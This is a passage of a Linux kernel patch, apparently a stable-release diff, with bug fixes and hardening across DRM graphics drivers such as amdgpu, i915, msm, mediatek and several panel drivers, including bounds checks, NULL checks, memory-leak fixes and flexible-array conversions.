+       * Driver will read the first ucNumDPMLevels in this array
+       */
+-      UCHAR clockInfoIndex[1];
++      UCHAR clockInfoIndex[];
+ } ATOM_PPLIB_STATE_V2;
+ 
+ typedef struct _StateArray{
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 0e78437c8389d..29f3d8431089e 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -758,7 +758,7 @@ static ssize_t amdgpu_set_pp_od_clk_voltage(struct device *dev,
+ 	if (adev->in_suspend && !adev->in_runpm)
+ 		return -EPERM;
+ 
+-	if (count > 127)
++	if (count > 127 || count == 0)
+ 		return -EINVAL;
+ 
+ 	if (*buf == 's')
+@@ -778,7 +778,8 @@ static ssize_t amdgpu_set_pp_od_clk_voltage(struct device *dev,
+ 	else
+ 		return -EINVAL;
+ 
+-	memcpy(buf_cpy, buf, count+1);
++	memcpy(buf_cpy, buf, count);
++	buf_cpy[count] = 0;
+ 
+ 	tmp_str = buf_cpy;
+ 
+@@ -795,6 +796,9 @@ static ssize_t amdgpu_set_pp_od_clk_voltage(struct device *dev,
+ 			return -EINVAL;
+ 		parameter_size++;
+ 
++		if (!tmp_str)
++			break;
++
+ 		while (isspace(*tmp_str))
+ 			tmp_str++;
+ 	}
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pptable_v1_0.h b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pptable_v1_0.h
+index b0ac4d121adca..e0e40b054c08b 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pptable_v1_0.h
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pptable_v1_0.h
+@@ -164,7 +164,7 @@ typedef struct _ATOM_Tonga_State {
+ typedef struct _ATOM_Tonga_State_Array {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries;		/* Number of entries. */
+-	ATOM_Tonga_State entries[1];	/* Dynamically allocate entries. */
++	ATOM_Tonga_State entries[];	/* Dynamically allocate entries. */
+ } ATOM_Tonga_State_Array;
+ 
+ typedef struct _ATOM_Tonga_MCLK_Dependency_Record {
+@@ -179,7 +179,7 @@ typedef struct _ATOM_Tonga_MCLK_Dependency_Record {
+ typedef struct _ATOM_Tonga_MCLK_Dependency_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_MCLK_Dependency_Record entries[1];				/* Dynamically allocate entries. */
++	ATOM_Tonga_MCLK_Dependency_Record entries[];				/* Dynamically allocate entries. */
+ } ATOM_Tonga_MCLK_Dependency_Table;
+ 
+ typedef struct _ATOM_Tonga_SCLK_Dependency_Record {
+@@ -194,7 +194,7 @@ typedef struct _ATOM_Tonga_SCLK_Dependency_Record {
+ typedef struct _ATOM_Tonga_SCLK_Dependency_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_SCLK_Dependency_Record entries[1];				 /* Dynamically allocate entries. */
++	ATOM_Tonga_SCLK_Dependency_Record entries[];				 /* Dynamically allocate entries. */
+ } ATOM_Tonga_SCLK_Dependency_Table;
+ 
+ typedef struct _ATOM_Polaris_SCLK_Dependency_Record {
+@@ -210,7 +210,7 @@ typedef struct _ATOM_Polaris_SCLK_Dependency_Record {
+ typedef struct _ATOM_Polaris_SCLK_Dependency_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries;							/* Number of entries. */
+-	ATOM_Polaris_SCLK_Dependency_Record entries[1];				 /* Dynamically allocate entries. */
++	ATOM_Polaris_SCLK_Dependency_Record entries[];				 /* Dynamically allocate entries. */
+ } ATOM_Polaris_SCLK_Dependency_Table;
+ 
+ typedef struct _ATOM_Tonga_PCIE_Record {
+@@ -222,7 +222,7 @@ typedef struct _ATOM_Tonga_PCIE_Record {
+ typedef struct _ATOM_Tonga_PCIE_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_PCIE_Record entries[1];							/* Dynamically allocate entries. */
++	ATOM_Tonga_PCIE_Record entries[];							/* Dynamically allocate entries. */
+ } ATOM_Tonga_PCIE_Table;
+ 
+ typedef struct _ATOM_Polaris10_PCIE_Record {
+@@ -235,7 +235,7 @@ typedef struct _ATOM_Polaris10_PCIE_Record {
+ typedef struct _ATOM_Polaris10_PCIE_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries;                                         /* Number of entries. */
+-	ATOM_Polaris10_PCIE_Record entries[1];                      /* Dynamically allocate entries. */
++	ATOM_Polaris10_PCIE_Record entries[];                      /* Dynamically allocate entries. */
+ } ATOM_Polaris10_PCIE_Table;
+ 
+ 
+@@ -252,7 +252,7 @@ typedef struct _ATOM_Tonga_MM_Dependency_Record {
+ typedef struct _ATOM_Tonga_MM_Dependency_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_MM_Dependency_Record entries[1]; 			   /* Dynamically allocate entries. */
++	ATOM_Tonga_MM_Dependency_Record entries[]; 			   /* Dynamically allocate entries. */
+ } ATOM_Tonga_MM_Dependency_Table;
+ 
+ typedef struct _ATOM_Tonga_Voltage_Lookup_Record {
+@@ -265,7 +265,7 @@ typedef struct _ATOM_Tonga_Voltage_Lookup_Record {
+ typedef struct _ATOM_Tonga_Voltage_Lookup_Table {
+ 	UCHAR ucRevId;
+ 	UCHAR ucNumEntries; 										/* Number of entries. */
+-	ATOM_Tonga_Voltage_Lookup_Record entries[1];				/* Dynamically allocate entries. */
++	ATOM_Tonga_Voltage_Lookup_Record entries[];				/* Dynamically allocate entries. */
+ } ATOM_Tonga_Voltage_Lookup_Table;
+ 
+ typedef struct _ATOM_Tonga_Fan_Table {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index a664a0a284784..47ff3694ffa57 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1221,7 +1221,7 @@ static int smu_smc_hw_setup(struct smu_context *smu)
+ {
+ 	struct smu_feature *feature = &smu->smu_feature;
+ 	struct amdgpu_device *adev = smu->adev;
+-	uint32_t pcie_gen = 0, pcie_width = 0;
++	uint8_t pcie_gen = 0, pcie_width = 0;
+ 	uint64_t features_supported;
+ 	int ret = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+index 1ab77a6cdb653..4174cb295dd0b 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+@@ -844,7 +844,7 @@ struct pptable_funcs {
+ 	 * &pcie_gen_cap: Maximum allowed PCIe generation.
+ 	 * &pcie_width_cap: Maximum allowed PCIe width.
+ 	 */
+-	int (*update_pcie_parameters)(struct smu_context *smu, uint32_t pcie_gen_cap, uint32_t pcie_width_cap);
++	int (*update_pcie_parameters)(struct smu_context *smu, uint8_t pcie_gen_cap, uint8_t pcie_width_cap);
+ 
+ 	/**
+ 	 * @i2c_init: Initialize i2c.
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index d6479a8088554..636b9579b96b0 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -298,8 +298,8 @@ int smu_v13_0_get_pptable_from_firmware(struct smu_context *smu,
+ 					uint32_t pptable_id);
+ 
+ int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
+-				     uint32_t pcie_gen_cap,
+-				     uint32_t pcie_width_cap);
++				     uint8_t pcie_gen_cap,
++				     uint8_t pcie_width_cap);
+ 
+ #endif
+ #endif
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+index ca278280865fa..ed2112efc6c68 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+@@ -2368,8 +2368,8 @@ static int navi10_get_power_limit(struct smu_context *smu,
+ }
+ 
+ static int navi10_update_pcie_parameters(struct smu_context *smu,
+-				     uint32_t pcie_gen_cap,
+-				     uint32_t pcie_width_cap)
++					 uint8_t pcie_gen_cap,
++					 uint8_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	PPTable_t *pptable = smu->smu_table.driver_pptable;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index fbc4d706748b7..cfd41d56e9701 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2084,14 +2084,14 @@ static int sienna_cichlid_display_disable_memory_clock_switch(struct smu_context
+ #define MAX(a, b)	((a) > (b) ? (a) : (b))
+ 
+ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+-					 uint32_t pcie_gen_cap,
+-					 uint32_t pcie_width_cap)
++						 uint8_t pcie_gen_cap,
++						 uint8_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	struct smu_11_0_pcie_table *pcie_table = &dpm_context->dpm_tables.pcie_table;
+ 	uint8_t *table_member1, *table_member2;
+-	uint32_t min_gen_speed, max_gen_speed;
+-	uint32_t min_lane_width, max_lane_width;
++	uint8_t min_gen_speed, max_gen_speed;
++	uint8_t min_lane_width, max_lane_width;
+ 	uint32_t smu_pcie_arg;
+ 	int ret, i;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 3104d49379090..1b0fb93539ec4 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -2486,8 +2486,8 @@ int smu_v13_0_mode1_reset(struct smu_context *smu)
+ }
+ 
+ int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
+-				     uint32_t pcie_gen_cap,
+-				     uint32_t pcie_width_cap)
++				     uint8_t pcie_gen_cap,
++				     uint8_t pcie_width_cap)
+ {
+ 	struct smu_13_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	struct smu_13_0_pcie_table *pcie_table =
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 503e844baede2..af244def4801b 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -324,12 +324,12 @@ static int smu_v13_0_0_check_powerplay_table(struct smu_context *smu)
+ 	if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_HARDWAREDC)
+ 		smu->dc_controlled_by_gpio = true;
+ 
+-	if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_BACO ||
+-	    powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_MACO)
++	if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_BACO) {
+ 		smu_baco->platform_support = true;
+ 
+-	if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_MACO)
+-		smu_baco->maco_support = true;
++		if (powerplay_table->platform_caps & SMU_13_0_0_PP_PLATFORM_CAP_MACO)
++			smu_baco->maco_support = true;
++	}
+ 
+ 	table_context->thermal_controller_type =
+ 		powerplay_table->thermal_controller_type;
+@@ -1645,38 +1645,10 @@ static int smu_v13_0_0_set_power_profile_mode(struct smu_context *smu,
+ 		}
+ 	}
+ 
+-	if (smu->power_profile_mode == PP_SMC_POWER_PROFILE_COMPUTE &&
+-		(((smu->adev->pdev->device == 0x744C) && (smu->adev->pdev->revision == 0xC8)) ||
+-		((smu->adev->pdev->device == 0x744C) && (smu->adev->pdev->revision == 0xCC)))) {
+-		ret = smu_cmn_update_table(smu,
+-					   SMU_TABLE_ACTIVITY_MONITOR_COEFF,
+-					   WORKLOAD_PPLIB_COMPUTE_BIT,
+-					   (void *)(&activity_monitor_external),
+-					   false);
+-		if (ret) {
+-			dev_err(smu->adev->dev, "[%s] Failed to get activity monitor!", __func__);
+-			return ret;
+-		}
+-
+-		ret = smu_cmn_update_table(smu,
+-					   SMU_TABLE_ACTIVITY_MONITOR_COEFF,
+-					   WORKLOAD_PPLIB_CUSTOM_BIT,
+-					   (void *)(&activity_monitor_external),
+-					   true);
+-		if (ret) {
+-			dev_err(smu->adev->dev, "[%s] Failed to set activity monitor!", __func__);
+-			return ret;
+-		}
+-
+-		workload_type = smu_cmn_to_asic_specific_index(smu,
+-						       CMN2ASIC_MAPPING_WORKLOAD,
+-						       PP_SMC_POWER_PROFILE_CUSTOM);
+-	} else {
+-		/* conv PP_SMC_POWER_PROFILE* to WORKLOAD_PPLIB_*_BIT */
+-		workload_type = smu_cmn_to_asic_specific_index(smu,
++	/* conv PP_SMC_POWER_PROFILE* to WORKLOAD_PPLIB_*_BIT */
++	workload_type = smu_cmn_to_asic_specific_index(smu,
+ 						       CMN2ASIC_MAPPING_WORKLOAD,
+ 						       smu->power_profile_mode);
+-	}
+ 
+ 	if (workload_type < 0)
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index bf24850027dab..bd065f1c699f5 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -326,12 +326,13 @@ static int smu_v13_0_7_check_powerplay_table(struct smu_context *smu)
+ 	if (powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_HARDWAREDC)
+ 		smu->dc_controlled_by_gpio = true;
+ 
+-	if (powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_BACO ||
+-	    powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_MACO)
++	if (powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_BACO) {
+ 		smu_baco->platform_support = true;
+ 
+-	if (smu_baco->platform_support && (BoardTable->HsrEnabled || BoardTable->VddqOffEnabled))
+-		smu_baco->maco_support = true;
++		if ((powerplay_table->platform_caps & SMU_13_0_7_PP_PLATFORM_CAP_MACO)
++					&& (BoardTable->HsrEnabled || BoardTable->VddqOffEnabled))
++			smu_baco->maco_support = true;
++	}
+ 
+ 	table_context->thermal_controller_type =
+ 		powerplay_table->thermal_controller_type;
+diff --git a/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c b/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
+index 3276a3e82c628..916f2c36bf2f7 100644
+--- a/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
++++ b/drivers/gpu/drm/arm/display/komeda/komeda_pipeline_state.c
+@@ -1223,7 +1223,7 @@ int komeda_build_display_data_flow(struct komeda_crtc *kcrtc,
+ 	return 0;
+ }
+ 
+-static void
++static int
+ komeda_pipeline_unbound_components(struct komeda_pipeline *pipe,
+ 				   struct komeda_pipeline_state *new)
+ {
+@@ -1243,8 +1243,12 @@ komeda_pipeline_unbound_components(struct komeda_pipeline *pipe,
+ 		c = komeda_pipeline_get_component(pipe, id);
+ 		c_st = komeda_component_get_state_and_set_user(c,
+ 				drm_st, NULL, new->crtc);
++		if (PTR_ERR(c_st) == -EDEADLK)
++			return -EDEADLK;
+ 		WARN_ON(IS_ERR(c_st));
+ 	}
++
++	return 0;
+ }
+ 
+ /* release unclaimed pipeline resource */
+@@ -1266,9 +1270,8 @@ int komeda_release_unclaimed_resources(struct komeda_pipeline *pipe,
+ 	if (WARN_ON(IS_ERR_OR_NULL(st)))
+ 		return -EINVAL;
+ 
+-	komeda_pipeline_unbound_components(pipe, st);
++	return komeda_pipeline_unbound_components(pipe, st);
+ 
+-	return 0;
+ }
+ 
+ /* Since standalone disabled components must be disabled separately and in the
+diff --git a/drivers/gpu/drm/drm_lease.c b/drivers/gpu/drm/drm_lease.c
+index d72c2fac0ff1a..b7362356e5448 100644
+--- a/drivers/gpu/drm/drm_lease.c
++++ b/drivers/gpu/drm/drm_lease.c
+@@ -507,8 +507,8 @@ int drm_mode_create_lease_ioctl(struct drm_device *dev,
+ 	/* Handle leased objects, if any */
+ 	idr_init(&leases);
+ 	if (object_count != 0) {
+-		object_ids = memdup_user(u64_to_user_ptr(cl->object_ids),
+-					 array_size(object_count, sizeof(__u32)));
++		object_ids = memdup_array_user(u64_to_user_ptr(cl->object_ids),
++					       object_count, sizeof(__u32));
+ 		if (IS_ERR(object_ids)) {
+ 			ret = PTR_ERR(object_ids);
+ 			idr_destroy(&leases);
+diff --git a/drivers/gpu/drm/gma500/psb_drv.h b/drivers/gpu/drm/gma500/psb_drv.h
+index ae544b69fc475..52f9ed3c24b8e 100644
+--- a/drivers/gpu/drm/gma500/psb_drv.h
++++ b/drivers/gpu/drm/gma500/psb_drv.h
+@@ -426,6 +426,7 @@ struct drm_psb_private {
+ 	uint32_t pipestat[PSB_NUM_PIPE];
+ 
+ 	spinlock_t irqmask_lock;
++	bool irq_enabled;
+ 
+ 	/* Power */
+ 	bool pm_initialized;
+diff --git a/drivers/gpu/drm/gma500/psb_irq.c b/drivers/gpu/drm/gma500/psb_irq.c
+index d421031462df6..ab2d49dab35a0 100644
+--- a/drivers/gpu/drm/gma500/psb_irq.c
++++ b/drivers/gpu/drm/gma500/psb_irq.c
+@@ -338,6 +338,8 @@ int gma_irq_install(struct drm_device *dev)
+ 
+ 	gma_irq_postinstall(dev);
+ 
++	dev_priv->irq_enabled = true;
++
+ 	return 0;
+ }
+ 
+@@ -348,6 +350,9 @@ void gma_irq_uninstall(struct drm_device *dev)
+ 	unsigned long irqflags;
+ 	unsigned int i;
+ 
++	if (!dev_priv->irq_enabled)
++		return;
++
+ 	spin_lock_irqsave(&dev_priv->irqmask_lock, irqflags);
+ 
+ 	if (dev_priv->ops->hotplug_enable)
+diff --git a/drivers/gpu/drm/i915/display/intel_cdclk.c b/drivers/gpu/drm/i915/display/intel_cdclk.c
+index 92925f0f72396..25dcdde5feb69 100644
+--- a/drivers/gpu/drm/i915/display/intel_cdclk.c
++++ b/drivers/gpu/drm/i915/display/intel_cdclk.c
+@@ -2368,6 +2368,18 @@ static int intel_compute_min_cdclk(struct intel_cdclk_state *cdclk_state)
+ 	for_each_pipe(dev_priv, pipe)
+ 		min_cdclk = max(cdclk_state->min_cdclk[pipe], min_cdclk);
+ 
++	/*
++	 * Avoid glk_force_audio_cdclk() causing excessive screen
++	 * blinking when multiple pipes are active by making sure
++	 * CDCLK frequency is always high enough for audio. With a
++	 * single active pipe we can always change CDCLK frequency
++	 * by changing the cd2x divider (see glk_cdclk_table[]) and
++	 * thus a full modeset won't be needed then.
++	 */
++	if (IS_GEMINILAKE(dev_priv) && cdclk_state->active_pipes &&
++	    !is_power_of_2(cdclk_state->active_pipes))
++		min_cdclk = max(2 * 96000, min_cdclk);
++
+ 	if (min_cdclk > dev_priv->display.cdclk.max_cdclk_freq) {
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "required cdclk (%d kHz) exceeds max (%d kHz)\n",
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_context.c b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+index 598028870124d..5e1b11db74816 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_context.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+@@ -844,6 +844,7 @@ static int set_proto_ctx_sseu(struct drm_i915_file_private *fpriv,
+ 		if (idx >= pc->num_user_engines)
+ 			return -EINVAL;
+ 
++		idx = array_index_nospec(idx, pc->num_user_engines);
+ 		pe = &pc->user_engines[idx];
+ 
+ 		/* Only render engine supports RPCS configuration. */
+diff --git a/drivers/gpu/drm/i915/i915_perf.c b/drivers/gpu/drm/i915/i915_perf.c
+index 3ce49c118b83f..2d4f09813a15b 100644
+--- a/drivers/gpu/drm/i915/i915_perf.c
++++ b/drivers/gpu/drm/i915/i915_perf.c
+@@ -3809,11 +3809,8 @@ int i915_perf_open_ioctl(struct drm_device *dev, void *data,
+ 	u32 known_open_flags;
+ 	int ret;
+ 
+-	if (!perf->i915) {
+-		drm_dbg(&perf->i915->drm,
+-			"i915 perf interface not available for this system\n");
++	if (!perf->i915)
+ 		return -ENOTSUPP;
+-	}
+ 
+ 	known_open_flags = I915_PERF_FLAG_FD_CLOEXEC |
+ 			   I915_PERF_FLAG_FD_NONBLOCK |
+@@ -4140,11 +4137,8 @@ int i915_perf_add_config_ioctl(struct drm_device *dev, void *data,
+ 	struct i915_oa_reg *regs;
+ 	int err, id;
+ 
+-	if (!perf->i915) {
+-		drm_dbg(&perf->i915->drm,
+-			"i915 perf interface not available for this system\n");
++	if (!perf->i915)
+ 		return -ENOTSUPP;
+-	}
+ 
+ 	if (!perf->metrics_kobj) {
+ 		drm_dbg(&perf->i915->drm,
+@@ -4306,11 +4300,8 @@ int i915_perf_remove_config_ioctl(struct drm_device *dev, void *data,
+ 	struct i915_oa_config *oa_config;
+ 	int ret;
+ 
+-	if (!perf->i915) {
+-		drm_dbg(&perf->i915->drm,
+-			"i915 perf interface not available for this system\n");
++	if (!perf->i915)
+ 		return -ENOTSUPP;
+-	}
+ 
+ 	if (i915_perf_stream_paranoid && !perfmon_capable()) {
+ 		drm_dbg(&perf->i915->drm,
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 395a190274cfb..2c850b6d945bc 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -1983,7 +1983,6 @@ static struct edid *mtk_dp_get_edid(struct drm_bridge *bridge,
+ 	bool enabled = mtk_dp->enabled;
+ 	struct edid *new_edid = NULL;
+ 	struct mtk_dp_audio_cfg *audio_caps = &mtk_dp->info.audio_cur_cfg;
+-	struct cea_sad *sads;
+ 
+ 	if (!enabled) {
+ 		drm_bridge_chain_pre_enable(bridge);
+@@ -2006,11 +2005,16 @@ static struct edid *mtk_dp_get_edid(struct drm_bridge *bridge,
+ 	 */
+ 	if (mtk_dp_parse_capabilities(mtk_dp)) {
+ 		drm_err(mtk_dp->drm_dev, "Can't parse capabilities\n");
++		kfree(new_edid);
+ 		new_edid = NULL;
+ 	}
+ 
+ 	if (new_edid) {
++		struct cea_sad *sads;
++
+ 		audio_caps->sad_count = drm_edid_to_sad(new_edid, &sads);
++		kfree(sads);
++
+ 		audio_caps->detect_monitor = drm_detect_monitor_audio(new_edid);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/dp/dp_panel.c b/drivers/gpu/drm/msm/dp/dp_panel.c
+index 5149cebc93f61..d38086650fcf7 100644
+--- a/drivers/gpu/drm/msm/dp/dp_panel.c
++++ b/drivers/gpu/drm/msm/dp/dp_panel.c
+@@ -266,26 +266,9 @@ int dp_panel_get_modes(struct dp_panel *dp_panel,
+ 
+ static u8 dp_panel_get_edid_checksum(struct edid *edid)
+ {
+-	struct edid *last_block;
+-	u8 *raw_edid;
+-	bool is_edid_corrupt = false;
++	edid += edid->extensions;
+ 
+-	if (!edid) {
+-		DRM_ERROR("invalid edid input\n");
+-		return 0;
+-	}
+-
+-	raw_edid = (u8 *)edid;
+-	raw_edid += (edid->extensions * EDID_LENGTH);
+-	last_block = (struct edid *)raw_edid;
+-
+-	/* block type extension */
+-	drm_edid_block_valid(raw_edid, 1, false, &is_edid_corrupt);
+-	if (!is_edid_corrupt)
+-		return last_block->checksum;
+-
+-	DRM_ERROR("Invalid block, no checksum\n");
+-	return 0;
++	return edid->checksum;
+ }
+ 
+ void dp_panel_handle_sink_request(struct dp_panel *dp_panel)
+diff --git a/drivers/gpu/drm/panel/panel-arm-versatile.c b/drivers/gpu/drm/panel/panel-arm-versatile.c
+index abb0788843c60..503ecea72c5ea 100644
+--- a/drivers/gpu/drm/panel/panel-arm-versatile.c
++++ b/drivers/gpu/drm/panel/panel-arm-versatile.c
+@@ -267,6 +267,8 @@ static int versatile_panel_get_modes(struct drm_panel *panel,
+ 	connector->display_info.bus_flags = vpanel->panel_type->bus_flags;
+ 
+ 	mode = drm_mode_duplicate(connector->dev, &vpanel->panel_type->mode);
++	if (!mode)
++		return -ENOMEM;
+ 	drm_mode_set_name(mode);
+ 	mode->type = DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED;
+ 
+diff --git a/drivers/gpu/drm/panel/panel-sitronix-st7703.c b/drivers/gpu/drm/panel/panel-sitronix-st7703.c
+index 86a472b01360b..b6e514aabe1d3 100644
+--- a/drivers/gpu/drm/panel/panel-sitronix-st7703.c
++++ b/drivers/gpu/drm/panel/panel-sitronix-st7703.c
+@@ -428,29 +428,30 @@ static int st7703_prepare(struct drm_panel *panel)
+ 		return 0;
+ 
+ 	dev_dbg(ctx->dev, "Resetting the panel\n");
+-	ret = regulator_enable(ctx->vcc);
++	gpiod_set_value_cansleep(ctx->reset_gpio, 1);
++
++	ret = regulator_enable(ctx->iovcc);
+ 	if (ret < 0) {
+-		dev_err(ctx->dev, "Failed to enable vcc supply: %d\n", ret);
++		dev_err(ctx->dev, "Failed to enable iovcc supply: %d\n", ret);
+ 		return ret;
+ 	}
+-	ret = regulator_enable(ctx->iovcc);
++
++	ret = regulator_enable(ctx->vcc);
+ 	if (ret < 0) {
+-		dev_err(ctx->dev, "Failed to enable iovcc supply: %d\n", ret);
+-		goto disable_vcc;
++		dev_err(ctx->dev, "Failed to enable vcc supply: %d\n", ret);
++		regulator_disable(ctx->iovcc);
++		return ret;
+ 	}
+ 
+-	gpiod_set_value_cansleep(ctx->reset_gpio, 1);
+-	usleep_range(20, 40);
++	/* Give power supplies time to stabilize before deasserting reset. */
++	usleep_range(10000, 20000);
++
+ 	gpiod_set_value_cansleep(ctx->reset_gpio, 0);
+-	msleep(20);
++	usleep_range(15000, 20000);
+ 
+ 	ctx->prepared = true;
+ 
+ 	return 0;
+-
+-disable_vcc:
+-	regulator_disable(ctx->vcc);
+-	return ret;
+ }
+ 
+ static const u32 mantix_bus_formats[] = {
+diff --git a/drivers/gpu/drm/panel/panel-tpo-tpg110.c b/drivers/gpu/drm/panel/panel-tpo-tpg110.c
+index 0b1f5a11a0554..735f1ea25c121 100644
+--- a/drivers/gpu/drm/panel/panel-tpo-tpg110.c
++++ b/drivers/gpu/drm/panel/panel-tpo-tpg110.c
+@@ -379,6 +379,8 @@ static int tpg110_get_modes(struct drm_panel *panel,
+ 	connector->display_info.bus_flags = tpg->panel_mode->bus_flags;
+ 
+ 	mode = drm_mode_duplicate(connector->dev, &tpg->panel_mode->mode);
++	if (!mode)
++		return -ENOMEM;
+ 	drm_mode_set_name(mode);
+ 	mode->type = DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED;
+ 
+diff --git a/drivers/gpu/drm/qxl/qxl_display.c b/drivers/gpu/drm/qxl/qxl_display.c
+index a152a7c6db215..f91a86225d5e7 100644
+--- a/drivers/gpu/drm/qxl/qxl_display.c
++++ b/drivers/gpu/drm/qxl/qxl_display.c
+@@ -1229,6 +1229,9 @@ int qxl_destroy_monitors_object(struct qxl_device *qdev)
+ 	if (!qdev->monitors_config_bo)
+ 		return 0;
+ 
++	kfree(qdev->dumb_heads);
++	qdev->dumb_heads = NULL;
++
+ 	qdev->monitors_config = NULL;
+ 	qdev->ram_header->monitors_config = 0;
+ 
+diff --git a/drivers/gpu/drm/radeon/radeon_connectors.c b/drivers/gpu/drm/radeon/radeon_connectors.c
+index f7431d2246044..5837af5123a9f 100644
+--- a/drivers/gpu/drm/radeon/radeon_connectors.c
++++ b/drivers/gpu/drm/radeon/radeon_connectors.c
+@@ -1122,6 +1122,8 @@ static int radeon_tv_get_modes(struct drm_connector *connector)
+ 	else {
+ 		/* only 800x600 is supported right now on pre-avivo chips */
+ 		tv_mode = drm_cvt_mode(dev, 800, 600, 60, false, false, false);
++		if (!tv_mode)
++			return 0;
+ 		tv_mode->type = DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED;
+ 		drm_mode_probed_add(connector, tv_mode);
+ 	}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+index 591c301e6cf21..1a1a286bc749f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
